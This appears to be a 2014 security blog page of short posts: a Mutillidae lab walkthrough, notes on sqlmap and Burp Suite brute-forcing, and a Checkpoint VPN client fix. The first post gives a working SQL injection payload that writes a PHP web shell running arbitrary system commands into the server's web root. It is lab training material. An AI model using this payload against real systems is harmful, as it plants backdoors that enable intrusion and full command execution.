Monday, 14 April 2014

Mutillidae: Inject Web Shell Backdoor via SQL Injection

Using somewhat advanced SQL injection, we inject a new PHP file into the web root of the PHP server using and SQL injection vulnearbility in Mutillidae. The injection is a command shell written in PHP that give root access to the operating system.

A harmless example;

username=' union select null,1,null,null,null INTO DUMPFILE 'test.txt' -- '&password=&login-php-submit-button=Login

The backdoor;

' union select null,null,null,'<form action="" method="post" enctype="application/x-www-form-urlencoded"><table style="margin-left:auto; margin-right:auto;"><tr><td colspan="2">Please enter system command</td></tr><tr><td></td></tr><tr><td class="label">Command</td><td><input type="text" name="pCommand" size="50"></td></tr><tr><td></td></tr><tr><td colspan="2" style="text-align:center;"><input type="submit" value="Execute Command" /></td></tr></table></form><?php echo "<pre>";echo shell_exec($_REQUEST["pCommand"]);echo "</pre>"; ?>' INTO DUMPFILE '..\\..\\htdocs\\mutillidae\\backdoor.php' --


Friday, 11 April 2014

SQL Injection using SQLMap to Dump Some Cool Stuff (mutillidae)

After you get the HTTP request from burp suite to a text file, then we can use that file in SQLMap to begin injection.

Brute-force Authentication - Burp Suite

Here is the basic methods to brute force a web app. I found it very clean and tidy. Nice work.

Thursday, 10 April 2014

Checkpoint Remote Access 'connection failed' Issue with Windows 8 or 8.1

I have seen this issue in couple of clients, they were using windows 8 and windows 8.1.

They tried to connect with Remote Access Client E75.30, but 'connection failed' popup displayed straight away. There are couple of SKs about duplicate IP addresses etc.

Simply, Remote Access Clients E80.42 msi file (MSI) is the way to go.
File Name:CP_EPS_E80.42_RAC_Windows.msi
Product:Endpoint Security VPN
Minor Version:E80.42
Size:15.90 MB
Date Published:12/10/2013

It worked a treat.